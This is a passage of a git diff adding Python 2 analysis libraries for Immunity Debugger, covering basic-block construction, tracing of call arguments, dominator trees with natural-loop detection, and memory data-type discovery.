+ @return: Check Whether or not the provided address is part of a Function
+ """
+ return ( self.__getitem__( i ) & DEC_PROCMASK ) == DEC_PBODY
+
+
+class Function:
+ """
+ Class that contains information about a Function
+ """
+ def __init__(self, imm, start):
+ """
+ Class that contains information about a Function
+
+ @type imm: Debbuger OBJECT
+ @param imm: Debbuger
+
+ @type start: DWORD
+ @param start: Address of the begging of the function
+ """
+ if not start:
+ raise Exception, "Wrong Function Address: 0x%08x" % start
+
+ self.start = start
+ self.imm = imm
+ self.bb = []
+ self.bbhash = {} # Hash that contains the visited Blocks
+
+ def setStart(self,address):
+ """
+ Change the start of a Function
+
+ @type address: DWORD
+ @param address: New address of the function
+ """
+ self.start = address
+
+
+ def getStart(self):
+ """
+ Get the Address of the Function
+
+ @rtype: DWORD
+ @return: Address of the function
+ """
+ return self.start
+
+ def getName(self):
+ """
+ Get the name of the Function
+
+ @rtype: STRING
+ @return: Name of the Function
+ """
+ return self.imm.decodeAddress(self.start)
+
+ def getFunctionEnd(self):
+ ret = []
+ endblocks = self.getEnd()
+ for bb in endblocks:
+ op = self.imm.disasmBackward( bb.getEnd() )
+ ret.append( op.getAddress() )
+ return ret
+
+ def getEnd(self):
+ """
+ Get the end of the Function (Understanding end as the Basic Block with a ret inside)
+
+ @rtype: LIST of BasicBlock
+ @return: A list of all the basic block that end the function
+ """
+ ret = []
+ bb = self.getBasicBlocks()
+ for a in bb:
+ if a.isRet():
+ ret.append( a )
+ return ret
+
+ def findRetValue(self):
+ """
+ Find all the possible ret values on a function (Beta)
+ Note: This function only check the modifiers on a Ret BasicBlock, so the result might not be precise.
+
+ @type start: LIST OF OPCODE
+ @param start: Return all the possible modifiers of EAX
+ """
+ ret = []
+ endblocks = self.getEnd() # Grab all the Blocks with "Ret" on it.
+ for bb in endblocks:
+ opcodes = bb.getInstructions(self.imm)
+ # We are gonna loop over the instruction on the block backwardly, in order to
+ # find who is modifying eax before the ret.
+ for a in range( len(opcodes)-1, 0, -1):
+ op = opcodes[a]
+ if op.getOperandRegister(0) == "EAX" and op.optype[0] == 36:
+ ret.append( op )
+ break
+ return ret
+
+
+ def hasAddress(self, address):
+ """
+ Check if the given address is part of the Function
+
+ @type address: DWORD
+ @param force: Address of the instruction to check
+
+ @rtype: BasicBlock object
+ @return: If true, returns the corresponding Basic block else returns None
+ """
+ bb = self.getBasicBlocks()
+ for b in bb:
+ if address >= b.start and address <= b.end:
+ return b
+ return None
+
+ def getBasicBlocks(self, force = False):
+ """
+ Get basic block from the current Function
+
+ @type force: BOOLEAN
+ @param force: (Optional, Def: False) Force to Function to reparse the basic blocks
+
+ @rtype: LIST of BasicBlock objects
+ @return: Basic blocks of the current function
+
+
+ TODO: Recursion here is bad - we need to make this an iterative process with a work queue
+ """
+ if self.bb and not force:
+ return self.bb
+
+ op = None
+ if not self.imm.isAnalysed( self.start ):
+ self.imm.analyseCode( self.start )
+
+ #self.decode = self.imm.findDecode( self.start )
+ #self.imm.Log("Decode Len: %d" % len(self.decode))
+ #if not self.decode:
+ # raise Exception, "Couldn't find a proper Decode"
+ self._getBB(self.start)
+
+ return self.bb
+
+ # Depth First construction of Basic block
+ # This is the real recursive function that iterates over the function code flow creating basic block.
+ # The function iterate over every assembly code always following first the jmp/jmc
+ def _getBB(self, address):
+ decode = self.imm.findDecode( address )
+ if not decode:
+ raise Exception, "Couldn't find a proper Decode for address 0x%08x" % address
+ start = address
+ calls = []
+ while 1:
+ # XREF BASIC BLOCK:
+ # If we find our address has an xref, we know is the end the basic block
+ if decode.isJmpDestination( address ) and start != address:
+
+ if self.bbhash.has_key(start):
+ return
+ #self.imm.Log("BB created (xref): %08x %08x" % ( start, address ) )
+ op = self.imm.Disasm( address )
+ bb = XREFBasicBlock( start, address )
+ bb.setFunction( self )
+ bb.addTrueEdge( address )
+ bb.setCalls( calls )
+ if calls:
+ bb.setCalls( calls )
+ calls = [] # cleaning calls
+ self.bb.append( bb )
+ self.bbhash[ start ] = 1
+ start = address
+ if self.bbhash.has_key( address ):
+ return
+
+ #op = self.imm.disasmData( address ) XXX: change it for this one
+ op = self.imm.Disasm( address )
+ #self.imm.Log( op.getResult(), address = address)
+
+ # JMC Basic block:
+ # If we find a conditional jmp, its the end of a basic block. We recursively follow the jmp
+ if op.isConditionalJmp():
+ #self.imm.Log("BB conditional (JMC): %08x %08x" % ( start, address ) )
+ self.bbhash[ start ] = 1
+ bb = JMCBasicBlock( start, address + op.getSize() )
+ if calls:
+ bb.setCalls( calls )
+ calls = [] # cleaning calls
+ start = address + op.getSize()
+ bb.setFunction( self )
+ bb.addTrueEdge( op.getJmpConst() )
+ bb.addFalseEdge( start ) # the next instruction
+ self.bb.append( bb )
+
+ # if the jmp address is not on our current basic block list, we follow that leaf
+ if not self.bbhash.has_key( op.getJmpConst() ):
+ self._getBB( op.getJmpConst() )
+ op = self.imm.Disasm( address )
+
+ if self.bbhash.has_key( start ) :
+ return
+
+ # JMP Basic Block:
+ # If we find a jmp, we create a new basic block.
+ elif op.isJmp():
+ if not self.bbhash.has_key( address):
+ #self.imm.Log("BB conditional (JMP): %08x %08x" % ( start, address ) )
+ self.bbhash[ start ] = 1
+ bb = JMPBasicBlock( start, address + op.getSize() )
+ bb.setFunction( self )
+ bb.addTrueEdge( op.getJmpConst() )
+ if calls:
+ bb.setCalls( calls )
+ calls = [] # cleaning calls
+ self.bb.append( bb )
+ start = address + op.getSize()
+ if not self.bbhash.has_key( op.getJmpConst() ):
+ # We limit the jmp only on a decode we control.
+ # That means, it has to jmp into our own dll
+ try:
+ decode[op.getJmpConst()]
+ self._getBB( op.getJmpConst() )
+ except Exception:
+ pass
+ return
+
+ # RET Basic Block
+ # Whenever we find a ret, its the end of the tree. We create a Basic Block and return
+ elif op.isRet():
+ #self.imm.Log("BB conditional (RET): %08x %08x\n" % ( start, address ) )
+ self.bbhash[ start ] = 1
+ bb = RETBasicBlock( start, address + op.getSize() )
+ bb.setFunction( self )
+ if calls:
+ bb.setCalls( calls )
+ calls = [] # cleaning calls
+ self.bb.append( bb )
+ return
+ elif op.isCall():
+ calls.append( address )
+
+ address += op.getSize()
+
+
+
+class BasicBlock:
+ def __init__(self, start, end):
+ """
+ Basic Block class
+
+ @type start: DWORD
+ @param start: Address of the begging of the Basic Block
+
+ @type end: DWORD
+ @param end: Address of the end of the Basic Block
+ """
+ self.edgeamount = 0
+ self.start = start
+ self.end = end
+ self.calls = []
+ #self.Function is a pointer to our parent so we always have it available
+ self.Function = None
+ #TODO: Flesh this out - let's store as much information as possible in the basic blocks
+ #for example, if we write to the stack or heap or if we have various macros in us, etc
+
+ def setFunction(self, function):
+ self.Function = function
+
+ def getFunction(self):
+ return self.Function
+
+ def setCalls(self, calls):
+ self.calls = calls
+
+ def getCalls(self):
+ return self.calls
+
+ def __cmp__(self, other):
+ """
+ Comparision by the start address of the BB
+ """
+ return cmp(self.start, other.start)
+
+ def setStart(self, address):
+ """
+ Change the start of a Basic Block
+
+ @type address: DWORD
+ @param address: New address of the Basic Block
+ """
+ self.start = address
+
+ def addTrueEdge(self, addr):
+ self.trueedge = addr
+
+ def addFalseEdge(self, addr):
+ self.falseedge = addr
+
+ def getEdges(self):
+ if not self.edgeamount:
+ return (0,0)
+ elif self.edgeamount == 1:
+ if self.trueedge == 0:
+ return (0,0)
+ else:
+ return (self.trueedge,0)
+ else:
+ return ( self.trueedge, self.falseedge )
+
+ def getTrueEdge(self):
+ """
+ Get the 'true' Edge
+
+ @rtype: DWORD
+ @return: 'True' Edge of the Basic Block
+ """
+ if not self.edgeamount:
+ return None
+ elif self.edgeamount != 1:
+ return self.trueedge
+
+ def getFalseEdge(self):
+ """
+ Get the 'false' Edge
+
+ @rtype: DWORD
+ @return: 'False' Edge of the Basic Block (The 'false' edge, is not always present. Depends of the Basic Block)
+ """
+ if not self.edgeamount:
+ return None
+ elif self.edgeamount != 1:
+ return self.falseedge
+
+ def getDirectEdge(self):
+ """
+ Get the Edges of a Basic Block
+
+ @rtype: TUPLE of DWORD
+ @return: The Edge of the Basic Block (Might change depending of the basic block type)
+ """
+ if not self.edgeamount:
+ return ()
+ elif self.edgeamount == 1:
+ if self.trueedge == 0:
+ return ()
+ else:
+ return self.trueedge
+
+ def getSize(self):
+ """
+ Return the Size of the Basic Block
+
+ @rtype: DWORD
+ @return: Size of the Basic Block
+ """
+ return self.end - self.start
+
+ def setEnd(self, address):
+ """
+ Change the end of a Basic Block
+
+ @type address: DWORD
+ @param address: New address of the Basic Block end
+ """
+
+ self.end = address
+ def getLimits(self):
+ """
+ Get the limits of the basic block
+
+ @rtype: TUPLE OF DWORD
+ @return: (Beginning of BB, End of BB)
+ """
+ return ( self.start,self.end )
+
+ def getStart(self):
+ """
+ Get the begging of a Basic Block
+
+ @rtype: DWORD
+ @return: Beginning of the Basic Block
+ """
+ return self.start
+
+ def getEnd(self):
+ """
+ Get the End of a Basic Block
+
+ @rtype: DWORD
+ @return: End of the Basic Block
+ """
+ return self.end
+
+
+ def getInstructions(self, imm):
+ """
+ Get the disassembled instructions from a Basic Block
+
+ @type imm: Debugger OBJECT
+ @param imm: Debugger
+
+ @rtype: LIST of opCode OBJECT
+ @return: List of disassembled instructions
+ """
+ addr = self.start
+ instructions = []
+
+ while addr < self.end:
+ op = imm.Disasm( addr )
+ instructions.append( op )
+ addr += op.getSize()
+
+ return instructions
+
+ def isXref(self):
+ """
+ Check if a Basic Block was created from an XREF
+
+ @rtype: BOOLEAN
+ @return: Whether the Basic Block was created from an XREF
+ """
+ return isinstance(self, XREFBasicBlock)
+
+ def isConditionalJmp(self):
+ """
+ Check if a Basic Block was created from a Conditional Jump instruction
+
+ @rtype: BOOLEAN
+ @return: Whether the Basic Block was created from a Conditional Jump instruction
+ """
+ return isinstance(self, JMCBasicBlock)
+
+ def isJmp(self):
+ """
+ Check if a Basic Block was created from a Jump instruction
+
+ @rtype: BOOLEAN
+ @return: Whether the Basic Block was created from a Jump instruction
+ """
+ return isinstance(self, JMPBasicBlock)
+
+ def isRet(self):
+ """
+ Check if a Basic Block was created from a RET instruction
+
+ @rtype: BOOLEAN
+ @return: Whether the Basic Block was created from a RET instruction
+ """
+ return isinstance(self, RETBasicBlock)
+
+class XREFBasicBlock(BasicBlock):
+ def __init__(self, start, end):
+ """
+ XREF Basic Block, Basic Block created from a code reference
+
+ @type start: DWORD
+ @param start: Address of the begging of the Basic Block
+
+ @type end: DWORD
+ @param end: Address of the end of the Basic Block
+ """
+ BasicBlock.__init__(self, start, end)
+ self.edgeamount = 1
+
+class JMCBasicBlock(BasicBlock):
+ def __init__(self, start, end):
+ """
+ Conditional Jump Basic Block, Basic Block created from a conditional jump instruction (branch node)
+
+ @type start: DWORD
+ @param start: Address of the begging of the Basic Block
+
+ @type end: DWORD
+ @param end: Address of the end of the Basic Block
+ """
+ BasicBlock.__init__(self, start, end)
+ self.edgeamount = 2
+
+# Important Note:
+# Keep in mind, that the Edge of a JMP Basic block could be 0x0
+# (For example, in case like jmp [...]), we still don't take care of this special cases
+class JMPBasicBlock(BasicBlock):
+ def __init__(self, start, end):
+ """
+ Jump Basic Block, Basic Block created from a jump instruction
+
+ @type start: DWORD
+ @param start: Address of the begging of the Basic Block
+
+ @type end: DWORD
+ @param end: Address of the end of the Basic Block
+ """
+ BasicBlock.__init__(self, start, end)
+ self.edgeamount = 1
+
+class RETBasicBlock(BasicBlock):
+ def __init__(self, start, end):
+ """
+ RET Basic Block, Basic Block created from a RET instruction (exit node)
+
+ @type start: DWORD
+ @param start: Address of the begging of the Basic Block
+
+ @type end: DWORD
+ @param end: Address of the end of the Basic Block
+ """
+ BasicBlock.__init__(self, start, end)
+ self.edgeamount = 0
+
+class TraceArgs():
+ def __init__(self, imm, func_address, tracedarg, shownonusersupplied = False):
+ self.imm = imm
+ self.func_address = func_address
+ self.tracedarg = tracedarg
+ self.shownonusersupplied = shownonusersupplied
+
+ def get(self):
+ idx = 0
+ stack =[]
+ address = self.func_address
+
+ # Find the corresponding PUSH
+ while idx < COUNT:
+ op = self.imm.disasmBackward( address )
+ if op.isPush():
+ stack.append(1)
+ if len(stack) == self.tracedarg:
+ break
+ elif op.isPop():
+ if len(stack):
+ stack.pop(0)
+ else:
+ return
+ address = op.getAddress()
+ del op
+ idx += 1
+
+ # Is this a PUSH?
+ if idx < COUNT:
+ # Double check, just in case
+ dotraceback = True
+ if not op.isPush():
+ #imm.Log("XXX: Error, Opcode should be a Push")
+ return ()
+
+ # If the PUSH has no register, its a PUSH CONSTANT
+ # PUSH 0x400
+ if op.getOperandRegister(0) == "":
+ if not self.shownonusersupplied:
+ return ()
+ else:
+ return (op, [])
+
+ # If the Operand of the push is EBP, no need to get the traceback.
+ # Cause is probably a PUSH of arguments or a local variable.
+ # (At least, not now)
+ # PUSH [EBP+C]
+ elif op.getOperandRegister(0) == "EBP" and op.operand[0][3]:
+ dotraceback = False
+ #return (op, [])
+
+ show = []
+
+ # DOING THE TRACEBACK
+ if dotraceback:
+ self.modarg = []
+ self.visited = []
+
+ try:
+ self.traceArgBackWithDecode( op.getAddress(), op.operand[0][2] )
+ except IndexError:
+ op = self.traceArgBack( op.getAddress(), op.operand[0][2])
+ if op:
+ self.modarg.append(op)
+
+ newop = None
+
+ type = ""
+ for newop in self.modarg:
+ newop.type = ""
+ # If the second argument is a constant, then is not user-supplied
+ # MOV ESI, 0x200
+ if newop.getOperandRegister(1) == "":
+ if self.shownonusersupplied or newop.isCall():
+ show.append( newop )
+ else:
+ return ()
+ else:
+ type = ""
+ # op.operand[1][3] constante
+ if newop.getOperandRegister(1) == "EBP":
+ if newop.operand[1][3] < 0x80000000:
+ newop.type = "VARS"
+ else:
+ newop.type = "ARGS"
+
+ show.append( newop )
+
+ op.type = ""
+ # op.operand[1][3] constant
+ #
+ if op.getOperandRegister(0) == "EBP":
+ if op.operand[0][3] < 0x80000000 and op.operand[0][3] != 0:
+ op.type = ""
+ elif op.operand[0][3] > 0x80000000:
+ op.type = ""
+
+ #imm.Log("Found user-supplied for arg_%d in %s" % ( tracedarg, imm.disasm(ref[0]).result) , address = ref[0])
+ #imm.Log( "%s %s" % (op.getDisasm(), type), address = op.getAddress() )
+ #for msg in show:
+ # imm.Log( msg[0], address = msg[1] )
+ #imm.Log("------")
+ return (op, show)
+
+ return ()
+
+ # Note:
+ # We just trace for MOV (We skip arymethic and lea opcodes)
+ # This function search backward linearly, we should change it into changing using
+ # xrefs and probably detecting more than one traceBack
+ def traceArgBackWithDecode(self, address, register):
+ idx = 0
+ decode = self.imm.findDecode( address )
+
+ while idx < COUNT:
+ if address in self.visited:
+ return 0
+ op = self.imm.disasmBackward( address )
+ #imm.Log("> %s" % op.result, address = op.getAddress())
+ self.visited.append( address )
+ if op.isJmp():
+ return 0
+ if op.getResult()[:3] in ("MOV", "XOR"):
+ # Register is the source
+ # ex: MOV EAX, ...
+ if op.operand[0][2] == register:
+ self.modarg.append( op )
+ return 0
+ # If the register we are looking for is EAX, a CALL would be the one
+ # the modifier
+ # CALL ntdll.67225328
+ elif register == (1,0,0,0,0,0,0,0) and op.isCall():
+ self.modarg.append( op )
+ return 0
+
+ if decode.isJmpDestination(address):
+ for ref in self.imm.getXrefFrom( address ):
+ self.traceArgBackWithDecode(ref[0], register)
+
+ address = op.getAddress()
+ idx += 1
+ if decode:
+ # Finish looking if we reach the begging of the address
+ if decode.isFunctionStart( address ):
+ del decode
+ return None
+ del op
+
+ del decode
+ return None
+
+
+ # Note:
+ # We just trace for MOV (We skip arymethic and lea opcodes)
+ # This function search backward linearly, we should change it into changing using
+ # xrefs and probably detecting more than one traceBack
+ def traceArgBack(self, address, register):
+ idx = 0
+ decode = self.imm.findDecode( address )
+
+ while idx < COUNT:
+ op = self.imm.disasmBackward( address )
+ if op.getResult()[:3] == "MOV":
+ # Register is the source
+ # ex: MOV EAX, ...
+ if op.operand[0][2] == register:
+ return op
+ # If the register we are looking for is EAX, a CALL would be the one
+ # the modifier
+ # CALL ntdll.67225328
+ elif register == (1,0,0,0,0,0,0,0) and op.isCall():
+ return op
+
+ address = op.getAddress()
+ idx += 1
+ if decode:
+ # Finish looking if we reach the begging of the address
+ if decode.isFunctionStart( address ):
+ del decode
+ return None
+ del op
+
+ del decode
+ return None
diff --git a/1.73/Libs/libcontrolflow.py b/1.73/Libs/libcontrolflow.py
new file mode 100755
index 0000000..80f4de9
--- /dev/null
+++ b/1.73/Libs/libcontrolflow.py
@@ -0,0 +1,236 @@
+#!/usr/bin/env python
+
+"""
+(c) Immunity, Inc. 2004-2007
+
+
+U{Immunity Inc.}
+
+
+"""
+
+__VERSION__ = '1.0'
+
+#############################################################################
+class DominatorTree:
+ def __init__(self, imm, addr, blocks = False, recursion = False):
+ """
+ This class takes a function start address and calculate all Dominator Tree related tables:
+ - Predecessors
+ - Iterated Predecessors
+ - Dominators
+ - Immediate Dominators
+ - Post Dominators
+ - Immediate Post Dominators
+
+ @type imm: Debbuger OBJECT
+ @param imm: Debbuger
+
+ @type addr: DWORD
+ @param addr: function start address
+
+ @type blocks: DICTIONARY|False
+ @param blocks: Optionally you can provide a dictionary with the node address as key and a list of edges (mainly for testing purposes).
+ """
+
+ self.address = addr
+ self.imm = imm
+ self.blocks = {}
+ self.predecessors = {}
+ self.iterativepredecessors = {}
+ self.dominators = {}
+ self.immediatedominators = {}
+ self.postdominators = {}
+ self.immediatepostdominators = {}
+
+ if blocks:
+ self.blocks = blocks
+ else:
+ self.Initializate()
+
+ self.CalculatePredecessors()
+ self.CalculateDominators()
+ self.CalculateImmediateDominators()
+ if not recursion:
+ self.CalculatePostAndImmediatePostDominators()
+ self.CalculateIterativePredecessors()
+
+ def Initializate(self):
+ func = self.imm.getFunction(self.address)
+ blocks = func.getBasicBlocks()
+
+ for block in blocks:
+ edges = block.getEdges()
+ start = block.getStart()
+ self.blocks[start] = edges
+
+
+ def CalculatePredecessors(self):
+ for start,edges in self.blocks.iteritems():
+ #support an unknown quantity of edges (for inverse CFG processing)
+ for edge in edges:
+ if edge:
+ if edge not in self.predecessors.keys():
+ self.predecessors[edge] = []
+ self.predecessors[edge].append(start)
+
+ def CalculateIterativePredecessors(self):
+ for start in self.blocks:
+ self.iterativepredecessors[start] = []
+ if start in self.predecessors.keys():
+ self.__iterative_predecessors_helper(start, start)
+
+ def __iterative_predecessors_helper(self, base, newbase):
+ for pred in self.predecessors[newbase]:
+ if pred:
+ if newbase in self.dominators[pred]:
+ #this is a loop
+ continue
+ if pred not in self.iterativepredecessors[base]:
+ self.iterativepredecessors[base].append(pred)
+ if pred in self.predecessors.keys():
+ self.__iterative_predecessors_helper(base, pred)
+
+ def CalculateDominators(self):
+ """
+ Based in algorithm from "Advanced COMPILER DESIGN IMPLEMENTATION"
+ """
+
+ start = self.address
+ change = True
+ Domin = {}
+ Domin[start] = [ start ]
+ for n in self.blocks:
+ if n != start:
+ if n in self.predecessors.keys():
+ Domin[n] = self.blocks.keys()
+ else:
+ #a node without predecessors it's just dead code
+ Domin[n] = [ n ]
+
+ for n in Domin:
+ tmp = Domin[n]
+ tmp.sort()
+ Domin[n] = tmp
+
+ while change:
+ change = False
+ for n in self.blocks:
+ if n != start and n in self.predecessors.keys():
+ T = self.blocks.keys()
+ for p in self.predecessors[n]:
+ #intersect Domin(p) with tmp
+ intersect = []
+ for d in Domin[p]:
+ if d in T and d not in intersect:
+ intersect.append(d)
+ T = intersect
+
+ #D = T U n
+ D = intersect
+ if n not in D:
+ D.append(n)
+
+ D.sort()
+ if D != Domin[n]:
+ change = True
+ Domin[n] = D
+
+ self.dominators = Domin
+
+ def CalculateImmediateDominators(self):
+ for node in self.blocks:
+ idom = self.dominators[node][:]
+ #idom(node) != node
+ idom.remove(node)
+ for dom in self.dominators[node]:
+ if dom != node:
+ for sec_dom in self.dominators[dom]:
+ if sec_dom != dom and sec_dom in idom:
+ idom.remove(sec_dom)
+ self.immediatedominators[node] = idom
+
+ def CalculatePostAndImmediatePostDominators(self):
+ invertedCFG = self.predecessors
+ invertedCFG[self.address] = [ 0 ]
+
+ newstart = invertedCFG.keys()
+ for edges in invertedCFG.values():
+ for edge in edges:
+ if edge in newstart:
+ newstart.remove(edge)
+
+ for onestart in newstart:
+ dom = DominatorTree(self.imm, onestart, blocks=invertedCFG, recursion=True)
+ self.postdominators[onestart]=dom.dominators
+ self.immediatepostdominators[onestart]=dom.immediatedominators
+
+ def getDominators(self):
+ return self.dominators
+
+ def getImmediateDominators(self):
+ return self.immediatedominators
+
+ def getPostDominators(self):
+ return self.postdominators
+
+ def getImmediatePostDominators(self):
+ return self.immediatepostdominators
+
+ def getPredecessors(self):
+ return self.predecessors
+
+ def getIteratedPredecessors(self):
+ return self.iterativepredecessors
+
+ def getControlFlowGraph(self):
+ return self.blocks
+
+
+class ControlFlowAnalysis:
+ def __init__(self, imm, address, domtree=False):
+ """
+ @type imm: Debbuger OBJECT
+ @param imm: Debbuger
+
+ @type address: DWORD
+ @param address: function start address
+
+ @type domtree: OBJECT|False
+ @param domtree: Optionally you can provide a DominatorTree instance (mainly for testing purposes).
+ """
+
+ self.imm = imm
+ self.address = address
+ self.loops = []
+
+ if domtree:
+ self.domtree = domtree
+ else:
+ self.domtree = DominatorTree(self.imm, self.address)
+
+ def findNaturalLoops(self):
+ """
+ This function finds Natural Loops inside a function, using the information provided by dominator tree class.
+
+ @rtype: LIST
+ @return: A list of loops, each with this structure:
+ [ start, end, nodes ]
+ start: address of node receiving the back edge
+ end: address of node which has the back edge
+ node: list of node's addresses involved in this loop
+ """
+
+ for start,edges in self.domtree.blocks.items():
+ for edge in edges:
+ if edge and edge in self.domtree.dominators[start]:
+ loopNodes = []
+ for pred in self.domtree.iterativepredecessors[start]:
+ if pred not in self.domtree.iterativepredecessors[edge]:
+ loopNodes.append(pred)
+ loopNodes.append(start)
+ self.loops.append([edge,start,loopNodes])
+
+ return self.loops
+
+
diff --git a/1.73/Libs/libdatatype.py b/1.73/Libs/libdatatype.py
new file mode 100755
index 0000000..d206a39
--- /dev/null
+++ b/1.73/Libs/libdatatype.py
@@ -0,0 +1,383 @@
+#!/usr/bin/env python
+"""
+Immunity Discovery Data Type API for Immunity Debugger
+
+(c) Immunity, Inc. 2004-2007
+
+
+U{Immunity Inc.} Discovery Data Type API for python
+
+
+
+"""
+
+__VERSION__ = '1.1'
+
+import immutils
+import struct
+
+MEM = 1
+DWORD = 2
+MEM_ADDR = 3
+
+INT = 0
+STRING = 1
+UNICODE = 2
+POINTER = 3
+DOUBLEL = 4
+
+PLAINASCII = 0x01
+DIACRITICAL = 0x02
+RAREASCII = 0x10
+
+ctable = [
+ # 0x00.. 0x0F (TAB, Line feed, Carriage Return)
+ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+ 0x00, 0x13, 0x13, 0x00, 0x00, 0x13, 0x00, 0x00,
+ # 0x10.. 0x1F
+ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+ # 0x20.. 0x2F (space, punctuation, parentheses)
+ 0x03, 0x13, 0x13, 0x13, 0x13, 0x13, 0x13, 0x13,
+ 0x13, 0x13, 0x13, 0x13, 0x13, 0x13, 0x13, 0x13,
+ # 0x30.. 0x3F (digits, punctuation)
+ 0x03, 0x03, 0x03, 0x03, 0x03, 0x03, 0x03, 0x03,
+ 0x03, 0x03, 0x13, 0x13, 0x13, 0x13, 0x13, 0x13,
+ # 0x40.. 0x4F (@, letters A..O)
+ 0x13, 0x03, 0x03, 0x03, 0x03, 0x03, 0x03, 0x03,
+ 0x03, 0x03, 0x03, 0x03, 0x03, 0x03, 0x03, 0x03,
+ # 0x50.. 0x5F (letters P..Z, brackets, delimiters)
+ 0x03, 0x03, 0x03, 0x03, 0x03, 0x03, 0x03, 0x03,
+ 0x03, 0x03, 0x03, 0x13, 0x13, 0x13, 0x13, 0x13,
+ # 0x60.. 0x6F (`, letters a..o)
+ 0x13, 0x03, 0x03, 0x03, 0x03, 0x03, 0x03, 0x03,
+ 0x03, 0x03, 0x03, 0x03, 0x03, 0x03, 0x03, 0x03,
+ # 0x70.. 0x7F (letters p..z, braces)
+ 0x03, 0x03, 0x03, 0x03, 0x03, 0x03, 0x03, 0x03,
+ 0x03, 0x03, 0x03, 0x13, 0x13, 0x13, 0x13, 0x00,
+ # 0x80.. 0x8F
+ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+ 0x00, 0x00, 0x02, 0x00, 0x02, 0x02, 0x02, 0x02,
+ # 0x90.. 0x9F
+ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+ 0x00, 0x00, 0x02, 0x00, 0x02, 0x02, 0x02, 0x02,
+ # 0xA0.. 0xAF
+ 0x00, 0x00, 0x00, 0x02, 0x00, 0x02, 0x00, 0x02,
+ 0x00, 0x03, 0x02, 0x00, 0x00, 0x00, 0x03, 0x02,
+ # 0xB0.. 0xBF
+ 0x00, 0x02, 0x00, 0x02, 0x00, 0x02, 0x00, 0x00,
+ 0x00, 0x02, 0x02, 0x00, 0x02, 0x00, 0x02, 0x02,
+ # 0xC0.. 0xCF (capital diacritical characters)
+ 0x02, 0x02, 0x02, 0x02, 0x02, 0x02, 0x02, 0x02,
+ 0x02, 0x02, 0x02, 0x02, 0x02, 0x02, 0x02, 0x02,
+ # 0xD0.. 0xDF (capital diacritical characters)
+ 0x02, 0x02, 0x02, 0x02, 0x02, 0x02, 0x02, 0x00,
+ 0x02, 0x02, 0x02, 0x02, 0x02, 0x02, 0x02, 0x02,
+ # 0xE0.. 0xEF (small diacritical characters)
+ 0x02, 0x02, 0x02, 0x02, 0x02, 0x02, 0x02, 0x02,
+ 0x02, 0x02, 0x02, 0x02, 0x02, 0x02, 0x02, 0x02,
+ # 0xF0.. 0xFF (small diacritical characters)
+ 0x02, 0x02, 0x02, 0x02, 0x02, 0x02, 0x02, 0x00,
+ 0x02, 0x02, 0x02, 0x02, 0x02, 0x02, 0x02, 0x00 ]
+
+class Data:
+ def __init__(self, type, address, data = None, size = 0):
+ """ Base Data Class """
+ self.type = type
+ self.size = size
+ self.data = data
+ self.address = address
+ self.comment = '' # for the future
+ self.name = 'Data'
+
+ def setComment(self, comment):
+ self.comment = comment
+
+ def setData(self, data):
+ self.data = data
+
+ def Print(self):
+ """
+ Return information on the object
+
+ @rtype: STRING
+ @return: Object information
+ """
+ return str(self.data)
+
+ def getSize(self):
+ """
+ Return object's size
+
+ @rtype: Integer
+ @return: Object's Size
+ """
+ return self.size
+
+ def getAddress(self):
+ """
+ Return object's address
+
+ @rtype: Integer
+ @return: Object's address
+ """
+ return self.address
+
+class String(Data):
+ def __init__(self, address, data):
+ """ String Class """
+ Data.__init__(self, STRING, address, data, len(data) )
+ self.name = 'String'
+
+ def Print(self):
+ if self.data[-1] == "\x00":
+ return self.data[0:-1]
+ else:
+ return "'%s'" % self.data
+
+class Unicode(Data):
+ def __init__(self, address, data):
+ """ Unicode Class """
+ Data.__init__(self, UNICODE, address, data, len(data)*2 )
+ self.name = 'Unicode'
+ def Print(self):
+ if self.data[-1] == "\x00":
+ return immutils.prettyhexprint( self.data[0:-1] )
+ else:
+ return "'%s'" % self.data
+
+
+class DoubleLinkedList(Data):
+ def __init__(self, address, data):
+ """ Double Linked list Class """
+ Data.__init__(self, DOUBLEL, address, data, 8)
+ self.name = 'Double Linked List'
+
+ def Print(self):
+ return "( 0x%08x, 0x%08x )" % ( self.data[0], self.data[1] )
+
+PTR = 0
+FUNCTION_PTR = 1
+DATA_PTR = 2
+STACK_PTR = 3
+
+class Pointer(Data):
+ def __init__(self, address, data):
+ """ Pointer Class """
+ Data.__init__(self, POINTER, address, data, 4 )
+ self.mem = None
+ self.name = 'Pointer'
+ self.ptype = PTR
+
+ def isFunctionPointer(self):
+ return self.ptype == FUNCTION_PTR
+
+ def isCommonPointer(self):
+ return self.ptype == PTR
+
+ def isDataPointer(self):
+ return self.ptype == DATA_PTR
+
+ def isStackPointer(self):
+ return self.ptype == STACK_PTR
+
+ def Print(self):
+ mem = self.mem
+
+ if self.mem:
+ return "0x%08x in %s|%s " % (self.data, self.mem.getOwner(), self.mem.section)
+ return "0x%08x" % self.data
+
+ def setMemPage(self, mem):
+ self.mem = mem
+
+ if self.mem:
+
+ if self.mem.section == ".text":
+ self.ptype = FUNCTION_PTR
+ self.name = 'Function Pointer:'
+
+ elif self.mem.section == ".data":
+ self.ptype = DATA_PTR
+ self.name = 'Data Pointer:'
+
+
+class DataTypes:
+ def __init__(self, imm):
+ """
+ Data Discovery Class
+
+ @type imm: Debugger Object
+ @param imm: Initialized debugged object
+ """
+
+ self.MemPages = imm.getMemoryPages()
+ self.imm = imm
+
+ self.AllFunctions = [(self.isDoubleLinkedList, MEM), (self.isString, MEM),\
+ (self.isUnicode, MEM), (self.isPointer, DWORD) ]
+ self.DiscoverWhat = {'all': self.AllFunctions,\
+ 'pointers': [ (self.isPointer, DWORD) ],\
+ 'strings': [(self.isString, MEM), (self.isUnicode, MEM)],\
+ 'asciistrings': [ (self.isString, MEM)],\
+ 'unicodestrings': [ (self.isUnicode, MEM) ],\
+ 'doublelinkedlists': [ (self.isDoubleLinkedList, MEM) ],\
+ 'exploitable': [ (self.isPointer, DWORD), (self.isDoubleLinkedList, MEM) ]
+ }
+
+ def Get(self, address, size, iterate = 4, what = 'all'):
+ """
+ Discover types on Memory Space
+
+ @type address: DWORD
+ @param address: RVA of the memory to analize
+
+ @type size: DWORD
+ @param size: Size of memory to analize
+
+ @type iterate: Integer
+ @param iterate: (Optional, Def: 4) Iterate through given bytes
+
+ @type what: STRING
